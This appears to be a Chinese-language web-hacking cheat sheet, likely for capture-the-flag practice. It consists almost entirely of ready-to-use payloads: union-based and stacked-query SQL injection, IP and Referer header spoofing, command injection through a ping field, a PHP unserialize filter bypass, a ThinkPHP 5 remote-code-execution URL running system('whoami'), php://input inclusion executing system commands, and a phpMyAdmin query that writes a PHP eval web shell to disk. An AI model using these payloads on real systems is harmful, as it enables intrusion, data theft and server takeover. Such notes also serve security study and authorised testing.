常规的SQL注入
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="xxx"#
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema="xxx"#
1' union select 1,2,3 from xxx#
SQL注入select关键字绕过
条件
1.有注入点:即存在sql注入漏洞
2.未过滤:即未对";"号进行过滤
3.未禁用:即未禁止执行多条sql语句
语句
1';show tables;#
1';show columns from xxx;#
1';handler `xxx` open as `x`;handler `x` read next;#
禁用前端js
浏览器设置中添加禁止加载js的网站即可
请求IP和来源网址的伪造
ip地址的伪造
X-Forwarded-For: xxx.xxx.xxx.xxx
X-Originating-IP: xxx.xxx.xxx.xxx
X-Remote-IP: xxx.xxx.xxx.xxx.xxx
X-Remote-Addr: xxx.xxx.xxx.xxx
X-Client-IP: xxx.xxx.xxx.xxx
来源网址的伪造
Referer的正确拼写是referrfer,由于早期的HTTP规范的拼写错误,于是决定将错就错
Referer:https://www.google.com
Ping功能命令执行
命令截断,实现命令执行
command1 && command2
先执行 command1,如果为真,再执行 command2
command1 | command2
只执行 command2
command1 & command2
先执行 command2 后执行
command1 command1 || command2
先执行 command1,如果为假,再执行 command
Ping功能命令执行漏洞
| ping 127.0.0.1|ls
; ping 1270.0.1;ls
& ping 127.0.0.1&ls
都可以实现命令执行
简单的加解密
将处理步骤反过来即可
不影响序列化结果的情况下绕过简单的正则匹配
小tips —— O:后的数字添加+是不会影响序列化结果的
O:4:"Demo":1:{s:10:" Demo file";s:8:"fl4g.php";}
O:+4:"Demo":2:{s:10:" Demo file";s:8:"fl4g.php";}
ThinkPHP V5低版本漏洞
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&va
rs[1][]=whoami
strstr()函数绕过
这个是区分大小写的,将一个字母修改大小写即可绕过
php://input命令执行
php://input使用
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?><?php system('xxx');?>
phpMyAdmin写入一句话木马
select "<?php eval($_REQUEST['cmd'];)?>" into outfile '/tmp/shell.php'